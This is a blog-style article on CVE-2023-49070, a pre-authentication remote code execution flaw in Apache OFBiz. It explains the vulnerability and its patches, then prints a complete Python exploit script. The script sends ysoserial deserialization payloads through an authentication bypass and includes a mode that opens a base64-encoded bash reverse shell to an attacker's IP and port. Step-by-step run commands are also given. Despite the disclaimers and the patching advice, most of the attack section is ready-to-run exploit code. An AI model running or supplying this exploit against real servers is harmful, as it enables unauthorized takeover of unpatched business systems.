Apache OFBiz’s RCE Critical Vulnerability: CVE-2023-49070 (PoC)

Security vulnerabilities can be a significant threat to businesses, especially when they affect widely-used software.

Recently, a severe flaw in Apache OFBiz has been making headlines due to its potential for exploitation.

This article delves into the specifics of this vulnerability, known as CVE-2023-49070, and how it impacts users of Apache OFBiz and Atlassian’s JIRA software.

Understanding CVE-2023-49070 Vulnerability

The CVE-2023-49070 vulnerability is a significant security flaw that affects Apache OFBiz applications that are older than version 18.12.10.

This vulnerability is attributed to an XML-RPC Java deserialization bug, which can be exploited using a pre-authentication remote code execution (RCE) proof of concept (POC).

About Apache OFBiz

Apache OFBiz, or Open For Business, is a popular open-source enterprise resource planning (ERP) system.

It’s extensively utilized by businesses for various functions, including e-commerce inventory control, order processing, human resources, and accounting.

The software is also incorporated into Atlassian JIRA, a commercial project management and issue-tracking tool used by over 120,000 companies globally.

Consequently, any security issue in Apache OFBiz could potentially affect JIRA users too.

Identification, Partial Fix and Continued Risk

In early December 2023, a critical pre-authentication remote code execution (RCE) vulnerability was identified in Apache OFBiz. Known as CVE-2023-49070, this flaw allowed potential attackers to bypass authentication, execute arbitrary code, and access sensitive data.

To address this vulnerability, Apache released OFBiz version 18.12.10 on December 5, 2023, removing the XML-RPC code from the software.

However, the fix was not entirely successful. Upon further investigation, security researchers found that the root cause of CVE-2023-49070 remained unaddressed.

This meant that even with the software update, the vulnerability could still be exploited. In particular, the flawed logic in handling specific parameters such as “requirePasswordChange=Y” enabled attackers to bypass Apache’s fix using certain credential combinations.

This discovery led to the identification of a new bypass issue, designated as CVE-2023-51467. Apache addressed this issue in the subsequent release of OFBiz version 18.12.11 on December 26, 2023.

Despite the availability of this fix, many users have not yet updated their software. Given the presence of multiple public proof of concept (PoC) exploits for the pre-auth RCE, the flaw remains an attractive target for hackers.

To mitigate this risk, it is strongly recommended that all Apache OFBiz users upgrade to version 18.12.11 as soon as possible.

Exploiting CVE-2023-49070

Exploiting the CVE-2023-49070 vulnerability involves leveraging a pre-authentication remote code execution flaw in Apache OFBiz applications older than version 18.12.10.

This can be done using a proof of concept exploit, but it’s crucial to remember that such activities should only be carried out in controlled environments for security testing and enhancement purposes.

Python Script:

# This exploit has been written by Abdelhameed Ghazy 
# Twitter : https://twitter.com/abd0ghazy
# https://www.linkedin.com/in/abdelhameed-ghazy-1a50b619a/

import requests, sys, subprocess,base64,urllib3,os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)



headers = {
    'Content-Type': 'application/xml'
}


def rce(url,arg):
    try:
        payload=subprocess.check_output(["java","-jar","ysoserial-all.jar","CommonsBeanutils1",arg])
    except:
        sys.exit("""
        Command didn't executed, please make sure you have java binary v11
        this exploit tested on this env
        openjdk version "11.0.17" 2022-10-18
        OpenJDK Runtime Environment (build 11.0.17+8-post-Debian-2)
        OpenJDK 64-Bit Server VM (build 11.0.17+8-post-Debian-2, mixed mode, sharing)
        """)
    

    base64_payload=base64.b64encode(payload).decode()
    xml_data = '''<?xml version="1.0"?>
    <methodCall>
        <methodName>RCE-Test</methodName>
        <params>
            <param>
                <value>
                    <struct>
                        <member>
                            <name>rce</name>
                            <value>
                                <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                %s
                                </serializable>
                            </value>
                        </member>
                    </struct>
                </value>
            </param>
        </params>
    </methodCall>
    '''%base64_payload
    r=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=xml_data,headers=headers,verify=False)
    if "java.lang.reflect.InvocationTargetException" in r.text:
        print("Exploit Completed Successfully !")
    else:
        print("Not Sure Worked or not ")



def dns(url,arg):
    try:
        payload=subprocess.check_output(["java","-jar","ysoserial-all.jar","URLDNS",arg])
    except:
        sys.exit("""
        Command didn't executed, please make sure you have java binary v11
        this exploit tested on this env
        openjdk version "11.0.17" 2022-10-18
        OpenJDK Runtime Environment (build 11.0.17+8-post-Debian-2)
        OpenJDK 64-Bit Server VM (build 11.0.17+8-post-Debian-2, mixed mode, sharing)
        """)
    base64_payload=base64.b64encode(payload).decode()
    xml_data = '''<?xml version="1.0"?>
    <methodCall>
        <methodName>Dns</methodName>
        <params>
            <param>
                <value>
                    <struct>
                        <member>
                            <name>rce</name>
                            <value>
                                <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                %s
                                </serializable>
                            </value>
                        </member>
                    </struct>
                </value>
            </param>
        </params>
    </methodCall>
    '''%base64_payload
    r=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=xml_data,headers=headers,verify=False)
    if "No such service" in r.text:
        print("Exploit Completed Successfully !")
    else:
        print("Not Sure Worked or not ")

def shell(url,arg):
    try:
        ip=arg.split(":")[0]
        port=int(arg.split(":")[1])
        rev_shell_command="bash -i >& /dev/tcp/{ip}/{port} 0>&1".format(ip=ip,port=port)
        encoded_rev_shell_command=base64.b64encode(rev_shell_command.encode()).decode()
        rev_shell1='bash -c echo${IFS}%s|base64${IFS}-d|bash'%encoded_rev_shell_command
        rce(url,rev_shell1)

    except:
        sys.exit("Please make sure from data")


def main():

    if not len(sys.argv) > 3:
        sys.exit("""
                Usage: 
                python3 exploit.py target_url rce command
                python3 exploit.py target_url dns dns_url
                python3 exploit.py target_url shell ip:port
                """)

    if not os.path.exists("ysoserial-all.jar"):
        sys.exit("ysoserial-all.jar file must be in the same directory")

    target_url=str(sys.argv[1])
    action=str(sys.argv[2])
    arg=str(sys.argv[3])
    if not target_url.endswith("/"):
        target_url=target_url+"/"
    if not target_url.startswith("http://") and not target_url.startswith("https://"):
        sys.exit("""
                Please Enter a Valid target_url
                Ex: https://example.com
                """)

    if action == "rce":
        rce(target_url,arg)
    elif action == "dns":
        if not arg.startswith("http://") and not arg.startswith("https://"):
                    sys.exit("""
                Please Enter a Valid dns url
                Ex: https://example.com
                """)
        dns(target_url,arg)

    elif action == "shell":
        shell(target_url,arg)
    else:
        sys.exit("""
        Usage: 
        python3 exploit.py target_url rce command
        python3 exploit.py target_url dns dns_url
        python3 exploit.py target_url shell ip:port
        """)
        

main()

Preparing for the Exploitation

Before you can exploit the vulnerability, you need to download a specific tool: ysoserial-all.jar. This JAR file is essential for the exploitation process.

You can download it from GitHub.

Executing a DNS POC

Once you have downloaded the necessary file, you can execute a DNS POC.

To do this, run the following command:

python3 exploit.py https://url.local:8443 dns "https://url.domain.oastify.com"

Upon successful execution, you should see a message indicating that the exploit has been completed successfully.

This exploit results in a DNS lookup of type A for the specified domain name on the Burp Collaborator server.

The Burp Collaborator server is a service used by Burp Suite for testing web applications for security vulnerabilities. The server does not initiate any interactions but responds to interactions received from other systems.

Performing an RCE POC

After completing the DNS POC, you can proceed with an RCE POC. Run the following command:

python3 exploit.py https://url.local:8443 rce "touch /tmp/for-poc"

If the exploit is successful, you’ll see a message indicating successful completion. You can verify this by checking the /tmp directory. If you find a file named for-poc, it means the exploit was successful.

Please note that exploiting vulnerabilities like CVE-2023-49070 should only be done in a controlled environment and for educational or security improvement purposes.

Unauthorized exploitation of such vulnerabilities is illegal and unethical.

Conclusion

Staying abreast of security vulnerabilities and ensuring software is up-to-date is crucial in today’s digital landscape.

Users of Apache OFBiz and Atlassian JIRA need to take immediate action to protect their systems against CVE-2023-49070 and CVE-2023-51467.